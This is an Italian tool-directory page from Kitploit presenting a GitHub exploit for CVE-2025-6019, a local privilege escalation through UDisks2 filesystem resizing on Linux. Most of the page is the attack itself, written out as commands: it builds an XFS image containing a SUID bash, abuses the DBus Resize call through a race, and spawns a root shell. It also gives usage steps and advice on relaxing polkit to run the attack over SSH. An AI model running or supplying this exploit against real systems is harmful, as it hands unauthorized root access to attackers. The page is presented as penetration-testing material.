Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-6019-exploit — exploit | Kitploit
Strumenti/GitHubGitHub/and-oss/cve-2025-6019-exploit
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingBinary Exploitation
GitHuband-oss/cve-2025-6019-exploit

CVE-2025-6019-exploit

exploit

Vedi Repository
431 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-6019: Exploit di escalation dei privilegi tramite ridimensionamento del filesystem UDisks2

Dettagli della vulnerabilità

  • ID CVE: CVE-2025-6019
  • Impatto: Escalation locale dei privilegi (LPE)
  • Sistemi interessati: Sistemi Linux con versioni vulnerabili di udisks2
  • Meccanismo: Una condizione di gara durante il ridimensionamento del filesystem consente l'accesso a binari SUID in directory temporanee scrivibili da tutti
  • Componenti chiave:
    • Servizio udisks2 (interfaccia DBus)
    • Metodo org.freedesktop.UDisks2.Filesystem.Resize
    • Punti di mount temporanei sotto /tmp/blockdev*

Flusso di lavoro dell'exploit

1. Preparare l'immagine del filesystem malevolo (Attaccante)

root@kitploit:~
dd if=/dev/zero of=./xfs.image bs=1M count=300
mkfs.xfs ./xfs.image
mkdir ./xfs.mount
mount -t xfs ./xfs.image ./xfs.mount
cp /bin/bash ./xfs.mount
chmod 04555 ./xfs.mount/bash  # Set SUID bit
umount ./xfs.mount 

2. Attivare l'exploit (Macchina vittima)

root@kitploit:~
# Verify system capabilities
gdbus call --system --dest org.freedesktop.login1 \
  --object-path /org/freedesktop/login1 \
  --method org.freedesktop.login1.Manager.CanReboot

# Clear interference
killall -KILL gvfs-udisks2-volume-monitor

# Setup loop device
udisksctl loop-setup --file ./xfs.image --no-user-interaction

# Background watcher (executes when SUID binary appears)
while true; do 
  /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break
done 2>/dev/null &

# Trigger vulnerability via DBus
gdbus call --system --dest org.freedesktop.UDisks2 \
  --object-path /org/freedesktop/UDisks2/block_devices/loop0 \
  --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

3. Ottenere accesso root

root@kitploit:~
/tmp/blockdev*/bash -p  # Launch privileged shell
id
# uid=65534(nobody) gid=65534(nobody) euid=0(root)

Importante!

L'exploit funziona solo in una sessione logind!

  • Lo script deve essere eseguito da una sessione logind che sia Active=yes e Remote=no (es. tty1).
  • Quando viene avviato da una sessione SSH / pts/* / reverse-shell, la chiamata udisksctl loop-setup --no-user-interaction viene negata da polkit, quindi il PoC termina con “Impossibile creare il dispositivo loop”.

Nota:

  • Se si desidera utilizzare l'exploit tramite SSH, è necessario applicare una regola polkit temporanea.

Come usare l'exploit

Creare l'immagine suid

root@kitploit:~
$ sudo bash exploit.sh create 

Eseguire l'exploit sul sistema

root@kitploit:~
$ bash exploit.sh exploit 

Video POC

poc

Scarica lo strumento